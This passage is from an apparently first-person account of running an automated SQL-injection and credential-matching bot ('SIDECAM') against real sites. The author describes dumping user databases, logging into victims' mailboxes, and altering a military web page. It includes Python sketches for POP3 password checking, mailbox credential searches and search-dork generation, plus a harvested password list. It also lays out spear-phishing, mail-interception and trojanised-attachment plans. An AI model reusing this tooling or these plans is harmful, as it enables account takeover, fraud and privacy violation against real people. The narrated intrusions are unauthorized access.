Certain database records, reflecting the webpage's contents, contained an 
embedded "second stage" attack code in JavaScript, prepared either to 
redirect the user who opened that particular web site's section or to load 
and execute additional JS code from a different remote HTTP server. The 
server addresses in most cases ended with a Chinese domain suffix.
That gives us the first alternative.

The second one is the compromise of a web hosting company.
To serve a proper example right away: the bot gained access to the database 
of a Polish email/WWW hosting company, containing all the account 
login/password records needed by an attacker to take control of any website 
hosted by the company, providing the attacker with correct FTP credentials 
(this case is also mentioned in other sections of the text). The same schema 
also applies to the databases of penetrable web application development 
companies.

However, the most frequently noticed (analysing the Bot's results) way open 
to an attacker to infect a website with rogue redirection/exploit code was to 
exploit a SQL Injection vulnerability within a minor, less critical or 
long-dead but not yet removed webpage, stored however on a single SQL server 
administered by an institution holding more critical assets. Exploiting the 
fact that the vulnerable server-side code (let's say ASP in our example), 
while accessing SQL Server data, may use a database user account shared with 
many other databases stored on that single server, an attacker executes an 
automated enumeration of all the R/W accessible databases (using, for 
example, the db_name() MSSQL function). After that, all he needs is to select 
any database enumerated earlier that serves as the DB backend for a 
particular WWW site - this time a more critical one, not vulnerable to any 
direct attack - and to alter its contents, leaving the critical "secure" 
webpage either defaced or infecting visitors with trojans.

The absolute record-holder of this type, given the number of R/W accessible 
databases on a single SQL server, was a job portal development company. A 
minor, old, but still working job website belonging to the company was 
tracked down by S1 and verified by S2 as vulnerable to a database command 
execution attack using the "Register Account" interface as the SQL command 
injection entrypoint. After enumerating the R/W accessible databases, the 
Bot's S2 counted 800+ databases accessible using the same DB user as used by 
the vulnerable ASP script, including a retired military officer job portal 
and law enforcement job portals.

The most critical system, however, given the possible impact of a webpage 
defacement/malware infection attack, was a database server belonging to the 
US Defense Logistics Agency (DLA). Five out of twenty of all the 
server-stored databases were found write-accessible using the same DB user 
account shared with the vulnerable ASP code: a very old (dating back to the 
last century, actually) and hardly operational but still online system of the 
same agency, developed and "maintained" (not that they didn't try), according 
to a welcome banner, by the U.S. Space and Naval Warfare Systems Center 
(SPAWAR). It's not too hard to imagine the possible impact of installing 
defacement/trojan infection code within an official military-owned web system 
that uses the attacker-controlled database contents to render every single 
piece of data and script embedded within its mainpage's HTML body.
Since I've never been a big fan of shouty, messy defacements - all that was 
done in that case, to validate whether modification of the particular 
selected DLA page's contents (www.desc.dla.mil) was in fact possible using a 
vulnerability located in a completely different subdomain - was changing a 
single small 'a' letter in the frontpage's welcome text to a capital one. 
Actually, if the "misspelling" hasn't been noticed yet, it's quite possible 
it is still there...

One obvious conclusion is that the final resulting impact of an SQL 
Injection attack conducted through a vulnerable website's entrypoint, which 
reflects the interconnected database contents, can also be (for one) 
website-driven malware infection targeting client host machines. The affected 
website (now hosting a hostile script for redirection / malware installation) 
may be any web application whose contents are rendered using the database 
system shared with the vulnerable entrypoint, through the same ODBC user 
credentials.





11. I forget, therefore I am.
////////////////////////////

So, you say you use only top-notch, well secured systems, where common 
security holes are a distant history, yet your digital account still got 
hacked somehow...
Well, there's at least one thing we might be missing.
Even when you use trusted company systems like e-banking accounts, government 
or military provided systems, which, let's assume for a moment, are free from 
the most common security flaws :) , your password is long and random, you 
keep it private and have never even whispered it - there is still a single 
thing that makes any of these different system accounts vulnerable: your 
short memory.

The first, primitive version of the bot, messily coded, with statically 
compiled-in search queries (describing just a few possible victim patterns), 
after a day or two had probed and matched a DB command injection flaw within 
one of the web applications belonging to an aviation holding corporation 
operating in the USA (the holding actually owns six different airlines).
The actual impulse that made me continue this project and build the 
multilevel attack code (rather than just drop the case after acknowledging 
that the internet is an SQL Injection swamp) was a finding made while 
"studying" this particular system. After getting the admin's credentials 
using the particular SQLi vuln and logging into the personnel data 
administration panel - a single Excel document was downloaded, containing 
updated detailed information on 1361 company workers. Besides their 
addresses, phones and SSN numbers, every personal record had filled in a 
proper email address, a login name and an unprotected plaintext password 
belonging to the particular worker of the aviation support company's branch.

Now, I'm sure it may be obvious to you right now, but it wasn't so obvious to 
me at the time - while sitting there in the hard chair, looking at my 
laptop's display, reading the ID records - after about half an hour of 
reading (I know... I can't help it, I'm a slow thinker) I realized I was not 
looking at computer-generated, dictionary-based passwords assigned randomly 
by the web application upon registration - but at the actual VOLUNTARILY 
PROVIDED sensitive keywords of the users, stored without any kind of 
encryption, keywords with which every person asked wanted to protect their 
account. That, along with the fact that two columns to the left of the 
password field in the document lay an equally voluntarily entered contact 
email address, began to form the biggest question, one that hasn't stopped 
driving my mind crazy ever since: how many of those poor unaware people 
entered their email address together with the very password OPENING IT, right 
into a vulnerable, browser-accessible database system...

That was actually the first time I stood before the option of unauthorized 
email access. But since I was already a kind of "fallen researcher" whose 
crawling code was performing something like 1000 unauthorized penetration 
tests of different systems a day - my conscience didn't actually stand a 
chance...
Copy-pasting the first randomly chosen email/password into the mail portal 
login page and... I had an authenticated Yahoo mail account session in front 
of me.

Ten minutes later I knew the owner was a commercial aircraft pilot working 
for a US based airline, holding a pilot license for ERJ-170 / ERJ-190 
aircraft. I had his license number along with high-resolution scans of his 
FAA issued pilot license (saved in his mailbox's 'sent' folder), his SSN 
along with his detailed 401K form sent to an employer and the credentials to 
access his current funds state, and finally a scan of an FAA issued medical 
certificate stating that he should wear corrective lenses.
But hey! That was just the first email/pwd combo from the list I had used - 
it was obvious that it must have been just a fluke. And since getting into 
random email accounts and snooping through people's lives was not the kind of 
fun I prefer as a researcher, I decided to focus back on the goal: the 
numbers behind the password matching attack vector. For the rest of the day I 
was trying to manually identify the number of matching/non-matching email 
credential combos, at least for some small part of the entire list.
Approximately 3 out of every 10 passwords tested matched.
Some of them needed to be concatenated with a '1' or '2' digit (either at the 
beginning or the end of the password), some had to be shortened by removing 
the numerical suffixes (e.g. 'bart1969' was the DB password - additionally 
giving us the victim's DOB for free - and the simple 'bart' keyword guarded 
the email account). Somewhere after a makeshift lunch I ran into a Hotmail 
account which happened to belong to a Delta Airlines pilot. That was THE 
finding that actually changed my mind and let me decide to continue the 
project. After a quick search through the pilot's mail account I noticed 
correspondence with DA's IT branch, containing another pair of credentials - 
a private Delta Airlines pilot web account (extranet) login/password and a 
link to the DA login portal (connect.delta.com), sent by the IT branch after 
the pilot began his work for DA.

He hadn't deleted the message (and why would he? - after all, we all have 
weak memories), leaving it on his private email account. It is not the point 
now to wonder why DA didn't provide him with an internal business mailbox 
restricted to be accessible ONLY from a safe intranet or via IT provided 
smart-cards with asymmetric encryption, and finally why they allowed such 
sensitive information to be sent to a private email account. It is, however, 
the point of what online services could have been accessed through the DA 
electronic accounts. Let's just say one of the options the system provided to 
a user (pilot) was downloading airport specific security information and 
accessing FBI issued documents concerning aerial terrorist threat awareness.

At the end of that day I made up my mind: I would not bury the project after 
just the first 2 weeks of research, but I would try to make it grow into a 
fully automated code able to perform automatically every single step I had 
done to get where I was at that moment. The goal was simple: to find out what 
numbers 'in the wild' lie behind every part of this particular multilevel 
attack vector and, moreover, what its possible mutations could be.

The next morning I identified another DA pilot's email account, also hosted 
on Hotmail, within the aviation company customer list downloaded the day 
before. That account also contained the email, sent from IT, with the 
internal DA pilot account login credentials. Multiple other FAA system 
accounts were also identified, provided for pilot training / career path 
development.

The equation is quite simple: if just one single system you have ever logged 
into (or have an account in), to which you gave your universal password 
scheme AND a contact email, happens to be vulnerable to a database access 
attack vector, you may consider any other of your password protected accounts 
in different digital systems as compromised - often EVEN if they weren't 
protected by the same secret keyword pattern.

When the attacker gains knowledge of just a nickname/loginname/id held by the 
victim to access a more heavily protected information system with a 
changeable-password interface (an online bank, a business/service online 
account), it may be all he needs to compromise the account. After all, he 
already knows that the person used the same password at least twice, so it's 
quite possible he or she could have used some combination of it pretty much 
everywhere, isn't it? It is good, however, to hear the voices of security 
aware internet forum users consciously admitting to separating their common 
passwords into a few different pattern groups: one for home/local computer 
accounts, another for private email accounts and finally a different one for 
the most critical accounts, the ones provided by the office/service and the 
online financial services. Additionally it would be a wise practice not to 
connect ANY email account, either private or business, to anything else by 
the same password pattern. After all, you can never tell much about the 
security of the particular web portal you are about to register a new account 
in. After entering the contact email address required by the particular 
service's registration process, it is crucial to use a completely different 
secret word / password scheme than the one protecting your mailbox. You will 
sleep better, knowing that after any possible database compromise in the 
future, this will be the first and the last point the attacker can reach 
while trying to progress in the attack using the information you provided 
upon registration.

A good place for an attacker looking for email hijacking/cracking targets 
could be job seeker portal databases designed for active as well as retired 
military and government service workers. These systems are most often filled 
with highly sensitive information, including SSN numbers bound to detailed 
personal info, business email addresses, client-provided password/secret 
sequences and also officer service performance reports. In fact, this kind of 
data makes the best-suited target for politically motivated entities, 
producing in turn a cyberterror/cyberwarfare based threat to a particular 
government organization or country, rather than just another easy prey for a 
common electronic fraud criminal.

Looking at the whole case through the attacker's eyes, you could actually 
compare a particular vulnerable job portal database to a bottle of wine... :)
After the penetration has been made, all the compromised email boxes lie open 
on the intruder's table. A particular victim that registered an account on 
the job portal - after getting a first job / switching to a better one - 
usually advances with experience and knowledge, but leaves the job portal 
account not updated, or sometimes even forgets about it. Additionally, since 
the email given during online registration at the portal is usually the same 
email address the victim used to contact the recruitment office of the new 
job - the attacker can easily identify the new victim's occupation, as well 
as any email message forwarded by the victim between the old email address 
(the one registered at the portal) and the new business email address. But 
since the victim has advanced - the importance of their personal info, as 
well as their professional competency and the scope of their digital access, 
has gained in value - just like old wine in the 'insecurity basement'. 
Finally, right after opening the bottle, an intruder, by simply linking the 
facts, can "learn" the victim from the correspondence stored on the different 
subsequently opened business/private mailboxes sharing the same password 
pattern. Reaching the victim's more critical infrastructure accounts - by 
using either known-password-pattern bruteforcing or "forgotten password" 
reminder services - the attacker can compromise the victim's multiple company 
business accounts, reflecting the victim's career path.

An example of a Bot-pentested job portal system may reveal a little bit of 
the magnitude of the possible compromise impact. A portal - designed by a US 
based company explicitly for retired military and law enforcement officers 
looking for a job at civilian companies requiring a higher (secret/top 
secret) security clearance - was identified by the Bot as containing an 
exploitable server-side flaw within the "New Account Registration" interface. 
Most users registered there hold, or used to hold, a military related career 
path ending with an officer rank. Often they also hold a TS security 
clearance. The runtime code managed to auto-identify and dump the 
email/password combo records within the database (provided at registration by 
the account owners) and passed them to the bot's Segment-3 for further 
automated password/email matching and mailbox message content analysis.
Among other penetrable accounts, it was able to gain access to a US Army Lt 
Col's private Hotmail mailbox.
While he holds a "Top Secret" clearance, his last occupation - according to a 
detailed unclassified CV stored within the mailbox - was a position of Branch 
Chief in the U.S. Defense Intelligence Agency (DIA). You could of course ask 
now why a guy holding a security-crucial position like this used the same 
password pattern more than once.
But that's not the point. Everybody uses a password pattern of some kind, 
just as everybody has a weak memory (especially me).
There are better questions, however: why didn't he delete the message sent to 
him by the US Embassy in Paris, containing information on a 6-day 
'Ambassador' hotel reservation, which included highly sensitive detailed 
payment information? The data within the embassy's message contained still 
valid VISA credit card details used for the room payment before a particular 
European NATO event, i.e. the full 14-digit credit card number, its 
expiration date and, what's most weird, the sensitive 3-digit security code 
(CVV2) needed for any online payment authorization. A much better question 
would be: why did the Embassy send such sensitive information via email, 
especially to a private Hotmail account?

And that's just one example.
Out of about 30 thousand email address/password combos stored in this 
portal's database, out of 800+ other db_name()'s stored on the particular 
MSSQL server and accessible through the flawed ASP interface using the shared 
DB user account, out of about 29 different recruitment companies whose web 
systems have been found vulnerable to database injection attacks by the Bot 
so far.
You do the math...





12. Second Stage Attack Impact And Propagation.
///////////////////////////////////////////////

The mailbox credentials matching attack vector, after just a few weeks of
play, became one of the primary subjects of the research. It has been
implemented as the Bot's Segment-3. The attack vector, employed by the S1,
S2 and S3 bot segments bound together, was for naming purposes simply
called 'SIDECAM' (SQL Injection Driven Email Credentials Active Matching).

In theory, after compromising the victim's mailbox password, a malicious
attacker may follow different attack propagation paths, depending strictly
on his goals - be they purely chaotic/destructive, financial or politically
motivated. Just as the motives behind the attack may differ, the final
impact of the SIDECAM-based final stage compromise may also vary, ranging
from a sensitive information leak, through compromise of further machines,
up to penetration of a secure intranet infrastructure.
The impact of the final 'SIDECAM' attack stage alone (S3) is in fact the
impact of a successful password compromise attack against a particular
mailbox, be it private, business or government provided.

Before launching S3, the gathered Email/Pw pairs were checked for password
frequency. The 40 most frequent passwords (i.e. passwords harvested by S2 -
NOT the passwords identified by S3 as matching their corresponding email
addresses), within the gathered base of 150K, sorted by descending
frequency, were:

123456
1234
12345
12345678
password
test
cancer
pass
fringe
drugs
qwerty
mother
summer
sunshine
soccer
654321
abc123
london
monkey
123456789
sparky
111111
baseball
captain
sailing
letmein
freedom
murphy
fashion
maggie
monaco
tigger
1234567
chocolate
dallas
flower
michelle
pain
shadow
1111

When the Bot's S3 was able to go operational (after S2 provided it with
enough mail credential pairs) it processed exactly 16344 email/password
pairs (out of 151595 gathered in total by S2 during its first few weeks of
runtime). S3 was configured to target only specific free mail provider
accounts: Hotmail, Msn, Gmail, AOL, Verizon, Comcast and EarthLink.
After reaching 16344 processed mailbox credential pairs (i.e. ones belonging
to the preconfigured provider pool), Segment-3 was shut down. It positively
matched exactly 3127 pairs (i.e. ones for which the particular password
successfully opened its corresponding email account, accepted either by the
provider's POP3/IMAP4 mail server or through S3's HTTP/S webmail login
interface parametric proxy).
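
For illustration, a minimal sketch of an S3-style POP3 credential check,
assuming plain POP3-over-SSL access (the webmail proxy path S3 also used is
omitted); the host name and credentials in the usage comment are
hypothetical:

# Minimal sketch of a POP3 credential check.
import poplib

def pop3_password_matches(host, user, password):
    # Returns True if the POP3 server accepts the given credentials.
    try:
        conn = poplib.POP3_SSL(host, 995, timeout=15)
        conn.user(user)
        conn.pass_(password)      # raises error_proto on AUTH failure
        conn.quit()
        return True
    except (poplib.error_proto, OSError):
        return False

# Hypothetical usage:
# pop3_password_matches("pop3.live.com", "someone@hotmail.com", "123456")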

The final "password reusage factor" (PRF), visualizing level of universal 
password usage among the internet users, oscillated through runtime around 
0.15 - 0.24 (shortly speaking: aprroximately 1 on every 4-5 processed email 
owners use the same password scheme for its digital, password protected 
accounts). Then, it should be also mentioned, the PRF's oscilation amplitude 
through the runtime depended at most on 2 factors: the type of the system 
(its infrastructure criticality level, expressed directly in the trust that 
the users have to the system) and the age of the particular S2 compromised 
system (the age of the most recent account created).

The reasoning behind the second factor is rather obvious - for a 10 year old
portal / web system account there is a far lower probability that the Em/Pw
combo will still match (it is more probable that the password has already
been changed after a compromise, or as a result of the user's increased
security awareness, or that the account was abandoned / deleted).

The first factor expressed itself most evidently in the case of the
vulnerable U.S. Department of Justice system. The users there were mostly
US Gov officials, usually law enforcement workers. The highest PRF (around
0.24) was noted in this particular system's case - the highest number of
Em/Pw combos were found matching by S3.
Later, apart from the free-email-provider S3 runtime, a different S3 test
case was executed (one targeting non-free, gov-provided email account
password matching). It resulted in access to multiple email accounts,
belonging mostly to PD officers and Sheriff Dept officers. It's unclear,
however, what the true factor behind the numbers was in this particular
system's case - whether they were the result of some kind of "reckless
distance" a gov worker keeps from his job ("I don't need to care for every
single digital account the gov gave me, as long as it's not my bank
account") - which, in this specific system's case (DoJ), would be somewhat
ironic - or rather completely the opposite: "while I'm registering the
account and entrusting my personal ID and password into the hands of a gov
department that handles people's security, how could it possibly be unsafe
and open to compromise? - i.e. my universal password is safe here."

Finally, the runtime results were correlated and compared, showing PRF
factors for each separate email provider.

ProcessedHotmail = 7070
ProcessedMsn = 792
ProcessedGmail = 3750
ProcessedAOL = 2625
ProcessedVerizon = 308
ProcessedComcast = 996

PositiveHotmail = 1664
PositiveMsn = 184
PositiveGmail = 386
PositiveAol = 490
PositiveVerizon = 45
PositiveComcast = 189

HotmailPosFactor = 0.23
MsnPosFactor = 0.23
GmailPosFactor = 0.10
AolPosFactor = 0.18
VerizonPosFactor = 0.14
ComcastPosFactor = 0.18
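
For clarity, the listed factors are simply positive/processed, truncated to
two decimals; a trivial sketch reproducing them from the numbers above:

processed = {"Hotmail": 7070, "Msn": 792, "Gmail": 3750,
             "AOL": 2625, "Verizon": 308, "Comcast": 996}
positive  = {"Hotmail": 1664, "Msn": 184, "Gmail": 386,
             "AOL": 490, "Verizon": 45, "Comcast": 189}
for provider, total in processed.items():
    prf = positive[provider] / total
    print(provider, "PosFactor =", int(prf * 100) / 100)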

Although in my opinion EXTREME CAUTION should be taken before drawing any
real conclusions from these numbers, there is at least one thing that draws
attention: over twice as many statistical users show a positive password
reuse match for Hotmail and Msn as for Gmail (and, amazingly, when treated
as two different test groups, Hotmail and Msn resulted in the same, highest
PRF factor, both being correlated by their mutual service provider, i.e.
Microsoft).

There are also questions concerning the reasoning behind some protections,
whether security or commercially motivated, implemented by particular email
providers. Gmail and Hotmail, for example, have a well implemented captcha
solution to verify whether consecutive mailbox auth attempts are driven by
a human (i.e. for security reasons). However, if one chooses POP3-based
mail synchronization, freely accessible there for anyone, he can easily
execute automated robot code.
In the Yahoo! Mail case we deal with the opposite situation - since there is
no free POP3 mail server available to Yahoo Mail free service users, just a
commercial solution called "Yahoo! Mail Plus", there is no easy way to
complete an automated POP3-driven password match (trying a POP3 mail server
with a particular free-mail Em/Pw pair will result in an AUTH-FAILED error,
just as if the account/password didn't match - however, when accessed
through Yahoo's webmail interface, we might be able to log in successfully).
Since the Yahoo webmail interface doesn't implement any captchas, one could
easily execute automated credential matching code just by implementing an
HTTPS webmail proxy wrapper.

The second part of this section focuses on successful SIDECAM attack
propagation - what could happen AFTER the hostile party succeeded in
breaching our mailbox. Since the further exploitation paths following
unauthorized email access are limited only by an attacker's imagination, we
can give it a try and sketch a few of the most probable courses of action
for a hypothetical intruder.

The very first thing an arbitrary attacker would probably do after breaching
the victim's mailbox is enumeration of any other accounts and systems that
the victim has access to. One good way to do this is simply using the
webmail 'message search' features and looking for any message containing
the words 'password', 'account' or 'login' - these emails will contain
registration confirmation credentials for different systems, password
reminder data or additional details revealing the existence of other
electronic accounts belonging to the victim (social portals, job portals,
business or service restricted systems, web admins' / web developers' FTP
credentials, etc.).
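
A hedged sketch of that enumeration step, assuming the mailbox has already
been downloaded locally in mbox format; the keywords follow the text above
and the file name is hypothetical:

import mailbox

KEYWORDS = ("password", "account", "login")

def find_credential_mails(path):
    # Collect (sender, subject) of messages that look credential-related.
    hits = []
    for msg in mailbox.mbox(path):
        subject = (msg["subject"] or "").lower()
        if any(word in subject for word in KEYWORDS):
            hits.append((msg["from"], msg["subject"]))
    return hits

# for sender, subject in find_credential_mails("victim1.mbox"):
#     print(sender, "|", subject)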

After enumerating the less critical, low security system accounts (the ones
whose credentials were either already stored within the mailbox or could be
retrieved successfully using just a login/id and the appropriate
send-password reminder service), the attacker may focus on more strongly
protected system accounts, like online banking accounts and electronic
money operation systems.
Let's look at the facts here.
Today's well designed financial assets operations system is a fortress. Or
should we rather say: it is meant to be a fortress. Most probably it would
be one, if both its defense system operators and its clients were robots.
In the real world, however, the security of a particular financial system's
client depends STRICTLY on his security threat awareness and - what's far
more important - on the threat imagination he has managed to develop.
Let's take a look, for example, at a common, well secured online account
facing a possible compromise of the related email's credentials. The
particular online bank provides the account's owner with brute force
attempt protections, never sends any sensitive data to the related email
address (so the attacker can't simply "email-remind" the account's
credentials), employs 2- or 3-level password authentication mechanisms,
separately for cash and non-cash operations (including one-time passwords
and SMS transaction authorization) and finally hardens the password
forgotten/reset operations with different ID information challenge-response
requests.

But as usual, there is one tiny issue in the whole case - no matter how hard
the security specialists try, we are just humans, not robots.
Quite often the amount of ID data embedded within the correspondence and
various sensitive documents found during the Bot's reconnaissance of a
particular mailbox was all the intel a malicious attacker would need to
perform a bank account password reset. SSNs, DoBs, addresses, phone
numbers, detailed health and service reports, even a secret question/answer
combo (universal as well) - all could be found in the victim's mailbox and
through it - whether within sent and saved CV documents, detailed cover
letters, business correspondence or the account configuration. Also, the
SMS authorization services can be diverted (by resetting/changing the SMS
number), using the info the attacker acquired after the mailbox breach.
Finally, as could be "noticed" during the research, in different cases a
particular person used their universal password four times or more, in
different places (including as the email password), in one form or another
(often concatenated with the number '1' to meet a particular password
policy's requirements) - so it wasn't much of a surprise to find that in a
few cases the very same password protecting the mailbox was also protecting
the particular user's online bank account.
Most surprising, however, despite all the warnings in the banks'
correspondence disclaimers, was to find in a user's mailbox a self-forwarded
message containing either partial or full credentials (UserID/Pw) for
accessing a particular web bank account. Even better: one particular person
had made an email folder named 'my passwords', where he stored all the
"needful" sensitive info, including PayPal IDs and aviation portal / system
accounts (he was a pilot). It seems that the one thing distinguishing a
human from a robot is most definitely a weak memory.

The easiest (but least subtle) action an attacker could perform is email
account hijacking (changing its password, secret question and answer).
Although it's probably the last thing to do if one wants to keep the
credentials compromise undetected for as long as possible, it could make a
successful tool for further blackmail and extortion attacks.

Finally, let's not forget about spam robots and automated email spoofing.
I agree: remote machine hijacking using malware, and exploitation of
physical access to the victim's email account data along with the contacts
stored within the host machine's email client, is one of the most common
ways for spammers to obtain both spam zombie robots and valid email account
credentials. But I guess not the only one.

Accounts compromised through an automated SIDECAM attack can make effective
fuel for any kind of spammer as well.

Browsing through a compromised sheriff department mailbox belonging to an
IT Division Chief (after a completed SIDECAM phase on one of the previously
mentioned vulnerable Department of Justice systems), I spotted a message
describing a recent incident involving spam being sent from one of the
sheriff dept's email accounts. It cautioned the SD's users ONLY to recheck
proper AV settings when operating from home machines. However, if the leak
source was not a malware infection of a government worker's home machine
but a similar SIDECAM-like attack on the DoJ - reinstalling an AV, or even
setting up a fresh clean OS, wouldn't make any difference to the attacker
who targeted the particular sheriff department account through the attack,
as the source of the email credentials compromise was both the leaky DoJ
system and the password reuse vulnerability.

The previous example introduces a second, far more interesting group of
attacker's courses of action, involving social engineering mechanisms and -
unlike the spambots - targeting precise, high value targets (chosen by a
specific attacker profile, being for example financially or politically
motivated).
Since this type of attack, to be successful, requires from the attacker a
proper study of the victim's profile (using for example the info gathered
from the victim's correspondence and social portal accounts), it cannot be
automated (I mean: at least until 2029 you will need a human to deceive a
human :)

Let's focus at the start on an attack employing spoofing of the identity of
the compromised email account's owner (let's call him "victim1") and
targeting a specific person ("victim2") from the breached mailbox's contacts
list.
A hypothetical attacker, after checking victim1's contacts (by either
analysing mailbox contents downloaded over POP3/IMAP or simply accessing
the contacts list through the particular webmail interface), will begin with
building a personal identity pattern for victim2, including every piece of
info he can find: what he/she likes, which types of web sites they visit
(have accounts in), current and previous occupation, interests/preferences,
what kind of information is exchanged between the contact and the mailbox
owner, what is the highest priority matter for victim2 at the moment, and
so on. Following that, an email must be forged employing the stolen identity
intel, containing as much personal data as possible to render the message
credible.

The attacker's goal will be to urge the remote mailbox owner (victim2) to
respond "positively" (according to the attacker's objectives), either by:
- visiting an attacker-controlled web site hosting malicious remote attack
code,
- launching an attached script/binary,
- revealing sensitive information.
The possible impact of such an attack is obviously compromise of victim2's
client machine and sensitive information access.

A specific mutation of this attack vector, not requiring the attacker to
execute a successful password matching SIDECAM attack, could be exploited
in a so called "spear phishing" scheme. It involves a phishing attack with
one major difference from common phishing - the fact that the attacker
already knows that the owner of every email address on the spammed list is
in possession of an account in the particular system (social portal, online
banking system, particular corporation's employee-restricted system), the
account that the attacker is interested in. After properly researching the
targeted organization, the attacker will target that precise account type.
Note that this attack may be launched by an arbitrary attacker after any
successful database email records harvest, especially when neither Login
nor Password data could be retrieved by the attacker (they were properly
one-way encrypted, for example) and just a bare email list and maybe some
basic ID data was retrieved (like name, phone or address) - this kind of
data is all the attacker needs to forge a trustworthy, credible message
pattern and execute a spear phishing attack, targeting for example
Login/Pwd account combos of the particular system.

Another kind of possible email breach exploitation (whether SIDECAM based
or not) would be inverted (in reference to the previous example) identity
spoofing, i.e. the case when the attacker, while spoofing some other email
identity (for example one of victim1's contacts - i.e. victim2 in the
previous example), sends a spoofed message to the controlled (breached)
victim1's mailbox, exploiting the intel gathered so far through the
victim1's email access.
After forging a credible, detailed message, an attacker can execute social
portal credentials phishing, bank account phishing, aim for victim1's
sensitive data (ID data / business secrets / service related confidential
data), spoof victim1's company representatives (anyone with a high enough
rank, found in the contacts or by email analysis) or execute a remote
execution attack by sending malware of any kind that the mailbox server
operator won't filter out (an executable / document-embedded 0day),
authenticating the message with the intel gathered so far on either victim1
or its spoofed contact, victim2.
Possible impact: compromise of the breached mailbox owner's machine
(victim1's).

A specific subtype of the above attack type would be "active conversation
interception". In this scenario the attacker, based on mailbox event
tracking (analysing any newly opened conversations, awaiting answers to the
victim's question/topic), will try to intercept (detect/read/delete) any
possibly high priority message (an answer awaited by the mailbox owner -
victim1), forging and sending a spoofed message inducing victim1 to either
share sensitive information or respond by executing (opening) a malware
(exploit) attachment. The more the conversation is valued by the victim -
the higher the probability of a successful attack.

Most likely to be exploited using this kind of attack would be, for example,
a resume (CV/cover letter) sent to a remote company and awaiting a response,
conversations with old colleagues and family members (but only those for
whom this email is the only way of communicating with the victim), or a job
offer from a registered job portal (since it's most probable the attacker
will gain access to the job portal using victim1's already known universal
password - he will also be able to monitor any events within victim1's job
portal profile, so any messages FROM the portal after profile updates can
be expected to be high priority to victim1), etc.

Another example would be execution of an ID phishing attack, spoofing any
actively (currently) used job portal mail account, with a message containing
a link to an attacker-controlled ID-data-phishing web site and requiring
additional, sensitive ID data (service reports / current job projects /
etc.), giving the false impression of a possibly attractive and available
job offer.

A certain mutation of that attack scenario would be a phishing attack
targeting credit card data.
After noticing that the victim has a credit card and recently used it in
some online shop (by looking in the victim's mailbox for any shop response
messages containing a successful purchase notification), and after
intercepting (deleting) the message, the attacker can begin a phishing
attack and imitate the shop's CC data update website, similar to the one
the user has previously registered his card in, requesting a CC data update
and motivating the operation with e.g. security reasons and validation of
the victim's shop account.

The last interesting way to exploit unauthorised email account access that I
came across during the project was self-forwarded attachment overriding.
The idea appeared after accessing an email account belonging to a Victoria
Police Department computer forensics detective. Among investigation
reports, forensic software FTP account data and other service related
messages, my attention was drawn to a recently self-forwarded message
containing a zipped installation version of a cell phone forensics software
package.
Since the only reason for forwarding an installation binary to oneself (it
happened to me a few times) is to be able to quickly set the software up on
a clean machine in a new place with just an internet connection, there was
a quite reasonable assumption that the file would be used (remotely
executed) in the near future.
An attacker could exploit that fact by replacing the recent message with
one containing an altered attachment, i.e. the same software installer
combined with trojan code.
The resulting impact would be compromise of any machine that victim1
installed the attached program on.

Apart from that particular example, any properly conducted, sophisticated
social engineering attack exploiting a compromised police department email
account may also result in infection and further penetration of the police
department's secure intranet system.

Note: spoofing driven attacks will most likely, after a relatively short
time, trigger a response message from the target to the person whose
identity has been spoofed, with questions about the suspicious message
(assuming only that the person is highly aware of common security threats),
which in turn will result in uncovering of the attack, and most likely of
the mailbox compromise as well, triggering further actions by the victim
such as compromised machine cleanup. Therefore the attacker's time-window
to utilize the compromised system will be relatively small.

Let's also not forget that a properly designed, EXTERNALLY (internet)
accessible webmail interface should provide every account holder with
mailbox login-event IP/date tracking features, accounting for at least a
few previous logins (Gmail would be one good example of such a proper
implementation).

On the other hand - finding the "source" (e.g. the particular credential
information leak source) of a victim's mailbox password compromise is a
difficult task.
After the problem has been signalled, even if one can assume the compromise
source was a SIDECAM-like attack, it would be hard to quickly point out the
precise system that, after being successfully attacked using SQL Injection
(or any other data-targeted attack), became the source of the sensitive
information leak. The particular victim could hold many accounts in
different systems - systems that could be old enough to hold multiple
vulnerabilities of different types.
The affected person might also have forgotten about some of the system
accounts a long time ago (it happened to me a few times actually) -
accounts that are still active, or perhaps were never even logged into
again, the victim just passing through these systems to "check&leave" there
his most precious sensitive information (the universal password, for
example). After some of the more critical system accounts are compromised,
it may sometimes be practically impossible to track the origins of the
particular victim's password data leak.

I should mention at the end that all the attack patterns presented above,
belonging to the second group of attacks (attacks involving social
engineering), are THEORETICAL SCHEMES ONLY, and haven't been executed by me
in any real situation during the project time.





13. Teaching a robot how to "value" its victim.
///////////////////////////////////////////////

Since the 'SIDECAM' attack vector is an example of a randomized-victim
attack type, to gain the most valuable results an attacker must focus on
proper parametrization of the code: he must design it in such a way that it
can target, ON ITS OWN, flexibly described, most valuable critical
infrastructure points.

This is all the game of probability and time.

For the SIDECAM attack vector, the point is to generate (for example) google
search query patterns derived from easily configurable regular expressions
describing internet system interfaces - for example job portals, retired
officer portals or any social web application systems provided for critical
infrastructure workers - the places where the most experienced people have
willingly stored their email/password data, unaware of the threat.
The strength of this attack vector (assuming a randomized-target attacker)
is based on the access level given to the attacker by the sensitive data he
can obtain afterwards, using all the intel and credentials gathered after
breaching the particular victim's mailbox. The more sophisticated the
victim's occupation / the higher the security clearance / the more
experienced the person - the bigger the final attack impact. A sketch of
such a query generator follows below.
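
Below is a minimal sketch of the kind of query-pattern generator described
above, assuming plain Google-dork style strings; the interface names,
suffixes and keywords are illustrative placeholders, not the patterns the
Bot actually used:

import itertools

interfaces = ["login", "logon", "register", "forgotpassword"]
suffixes   = [".asp", "_user.asp"]
keywords   = ['"job portal"', '"law enforcement"', '"security clearance"']

def generate_queries():
    # Every combination of interface name, suffix and victim-profile keyword.
    for name, suffix, keyword in itertools.product(interfaces, suffixes,
                                                   keywords):
        yield "inurl:" + name + suffix + " " + keyword

# for query in generate_queries():
#     print(query)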

Probability works fine in the real world - after stumbling for a few days
across different US .gov domain systems, the bot identified a vulnerable
Texas Department of Justice database system developed to provide various US
DoJ workers with a criminal background checking service. The vulnerability
existed in a 'password reminder' interface. As could have been predicted,
most of the registered users there were law enforcement workers. A 30000+
user account record MSSQL database was then enumerated and selectively
dumped, targeting auto-identified login/password/email records. The final
scanning stage was Segment-3's job: it performed automated password
validity matching for the selected email/password combos.
The major part of the DoJ system's accounts were registered by law
enforcement representatives, who presented their official gov-provided mail
account addresses upon registration. Now, since most properly designed
government and military information systems should provide access to email
services ONLY from machines belonging to the internal institution network
(intranet), it is impossible to connect to their login interfaces "from
outside", or without presenting a valid VPN/HTTPS certificate issued by the
CA either for the precise user's machine (and secured locally by MS's Data
Protection API) or carried by the user on his/her smartcard.
But again: 'most' doesn't mean 'every' :)
